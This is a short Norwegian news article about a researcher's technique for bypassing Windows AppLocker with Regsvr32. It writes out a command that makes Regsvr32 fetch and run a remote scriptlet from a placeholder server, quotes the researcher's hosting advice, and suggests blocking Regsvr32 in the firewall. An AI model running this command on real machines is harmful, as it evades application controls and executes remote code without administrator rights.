En forsker fra Colorado som går under navnet Casey Smith, har funnet ut at Regsvr32 kan brukes til å omgå AppLocker på Windows 10, og dette er et stort problem for databrukere, spesielt de i forretningsmiljøet.

AppLocker ble først introdusert i Windows 7 og Windows Server 2008 R2. Den er designet for å la administratorer spesifisere hvilken gruppe eller brukere som kan dra nytte av noen eller alle applikasjoner basert på filers unike identitet. Hvis du er en person som har en tendens til å bruke AppLocker, bør det være kjent at det kan brukes til å lage visse regler for å la applikasjoner kjøre eller stoppe dem i deres spor.

For de som kanskje ikke er klar over, kan Regvr32 brukes til å registrere og avregistrere DLL-er. Dette er ikke et verktøy med ett klikk, ettersom det er et kommandolinjeverktøy, så bare avanserte databrukere bør søke å dra nytte av det den har å tilby.

Vi forstår at ved å bruke denne teknikken, endrer det ikke datasystemets register, noe som gjør det vanskelig for administratorer å vite om det er gjort noen endringer.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

"Det fantastiske her er at regsvr32 allerede er proxy-klar, bruker TLS, følger viderekoblinger, etc. … Og … Du gjettet en signert, standard MS-binær. Så alt du trenger å gjøre er å være vertskap for din.sct-fil på et sted du kontrollerer, ”skrev Smith.

Teknikken ovenfor krever ikke administrative rettigheter, og den endrer ikke registeret. Videre kan skriptene kalles over både HTTP eller HTTPS. For øyeblikket har ikke Microsoft gitt ut en oppdatering for dette lille problemet, så det eneste alternativet på dette tidspunktet er å blokkere Regsvr32 via Windows-brannmuren.

Interessant nok har programvaregiganten ennå ikke svart om dette sikkerhetsproblemet som operativsystemet står overfor. Nå som det er ute i det fri, forventer vi å høre noe fra selskapet sammen med samtaler om en fremtidig oppdatering.